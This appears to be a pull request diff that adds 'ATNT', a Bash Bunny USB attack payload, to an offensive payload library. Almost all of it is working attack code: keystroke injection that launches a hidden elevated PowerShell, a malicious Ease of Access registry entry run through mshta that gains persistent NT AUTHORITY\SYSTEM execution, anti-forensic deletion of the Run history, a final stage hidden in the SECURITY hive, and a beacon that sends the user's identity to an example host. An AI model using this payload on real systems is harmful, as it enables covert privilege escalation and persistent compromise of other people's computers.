New payload ATNT; Ease of Access Assistive Technology (#454)

Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) 
to persistently run code with NT AUTHORITY\SYSTEM rights.

payloads/library/execution/ATNT/final_stage.ps1

@@ -0,0 +1 @@
+iwr ('https://example.com/beacon_'+(whoami))

payloads/library/execution/ATNT/payload.txt

@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title:         ATNT : Persistent NT AUTHORITY\SYSTEM implant
+# Description:   Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
+#                To persistently run code with NT AUTHORITY\SYSTEM rights.
+# Author:        9o3
+# Twitter:       @BugBot4
+# Version:       1.0
+# Category:      Execution
+# Attackmodes:   HID, Storage
+#
+# LED STATUS
+# ==========
+# SETUP.......Generate stage files
+# STAGE1......Run hidden elevated PowerShell window that creates the AT
+# STAGE2......Trigger the newly created AT
+# STAGE3......Update the newly created AT to run the final stage
+# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage
+# CLEANUP.....Remove generated files
+# FINISH......Finished
+#
+# OPTIONS
+# =======
+# Final stage configured from included final_stage.ps1 script
+# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop
+run_final_stage=true
+
+LED SETUP
+GET SWITCH_POSITION
+cd /root/udisk/payloads/
+cd $SWITCH_POSITION
+sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2
+sed '/!FINAL_STAGE!/{
+	s/!FINAL_STAGE!//g
+	r final_stage.ps1
+}' stage3.ps1 > 3
+
+ATTACKMODE HID STORAGE
+
+######## Run hidden elevated PowerShell window ########
+# Runs hidden elevated powershell which executes stage2.ps1
+LED STAGE1
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
+QUACK DELAY 200
+QUACK CTRL-SHIFT ENTER
+QUACK DELAY 750
+QUACK LEFTARROW
+QUACK DELAY 100
+QUACK ENTER
+
+######## Trigger the newly created AT ########
+# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM
+# The AT gets and executes stage3.ps1
+LED STAGE2
+QUACK DELAY 1000
+QUACK CTRL-ALT DEL
+QUACK DELAY 750
+QUACK ESC
+
+######## Update the newly created AT ########
+# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM
+# Updates the newly created AT to read and execute the final stage from the SECURITY hive
+LED STAGE3
+until [ -f /root/udisk/DONE ]
+do
+	sleep 0.2
+done
+if [ "$run_final_stage" = true ] ; then
+	######## Trigger the updated AT ########
+	# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage
+	LED STAGE4
+	QUACK CTRL-ALT DEL
+	QUACK DELAY 750
+	QUACK ESC  
+fi
+
+######## Remove generated files ########
+# Removes the generated stages and the DONE file used to indicate the end of the third stage
+LED CLEANUP
+rm /root/udisk/DONE
+rm 2
+rm 3
+sync
+LED FINISH

payloads/library/execution/ATNT/stage2.ps1

@@ -0,0 +1,14 @@
+#Remove latest run entry
+$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1);
+
+# Create AT to run next stage
+$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
+$atnt = $at+"\atnt"
+New-Item -Path $at -Name "atnt" -Force
+New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
+New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
+New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
+New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force
+
+#Add the newly created AT to automatically start on a desktop switch.
+New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force

payloads/library/execution/ATNT/stage3.ps1

@@ -0,0 +1,14 @@
+$payload = @"
+!FINAL_STAGE!
+"@
+
+New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
+New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
+
+# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
+New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
+
+#Let the Bash Bunny know we're done here & Eject.
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
+New-Item -ItemType file $bb"DONE";
+(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");